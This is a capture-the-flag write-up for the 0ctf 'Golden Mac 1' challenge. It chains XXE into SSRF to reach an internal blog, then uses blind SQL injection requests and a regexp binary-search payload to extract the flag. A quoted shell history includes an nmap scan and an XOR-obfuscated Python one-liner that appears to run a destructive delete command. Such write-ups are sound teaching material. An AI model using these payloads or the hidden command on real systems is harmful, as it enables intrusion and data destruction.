While playing Golden Mac 1 I found the ./bash_history for user salt that looked like:

whoami
pwd
ls
sudo nmap -sS 202.112.26.1/24 -p 22,80,3306
curl http://202.112.26.103/secret_blog/?id=1
msfconsole
curl https://twitter.com/_SaxX_/status/580376290525650944
python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"<br />
shit!
exit

While the SaxX tweet was funny, the secret_blog looked promising. The IP was not accessible from the outside but we could leverage our XXE injection into a SSRF vulnerability and visit the blog. Using the XXE injection in the docx document, you can visit http://202.112.26.103/secret_blog/?id=1 and get You do not have permission to access this post! Other interesting results were:

http://202.112.26.103/secret_blog/?id=1
You do not have permission to access this post!

http://202.112.26.103/secret_blog/?id=0
Please specify an id :)

http://202.112.26.103/secret_blog/?id=2
You do not have permission to access this post!

http://202.112.26.103/secret_blog/?id=3
Post not exists!

Also:

http://202.112.26.103/secret_blog/?id=1 order by 1
You do not have permission to access this post!

Cool! so it seems it is vulnerable to blind SQL injection.

Further steps:

http://202.112.26.103/secret_blog/?id=1 or id=(select 1)
You do not have permission to access this post!

http://202.112.26.103/secret_blog/?id=1 or id=(select notexisting from nowhere)
500 Internal error

http://202.112.26.103/secret_blog/?id=1 or id=(select flag from flag)
You do not have permission to access this post!
YAY!!

At this point it was a matter of running a blind sql injection attack to extract the flag.

True statements:

http://202.112.26.103/secret_blog/?id=1 and true
You do not have permission to access this post!

False statements:

http://202.112.26.103/secret_blog/?id=1 and false
Post not exists!

We get the flag using binary search with regular expressions like:

http://202.112.26.103/secret_blog/?id=1 and ((select flag from flag) regexp binary '^%s' = 1)

FLAG: 0ctf{you_good_pentester_finally_find_me}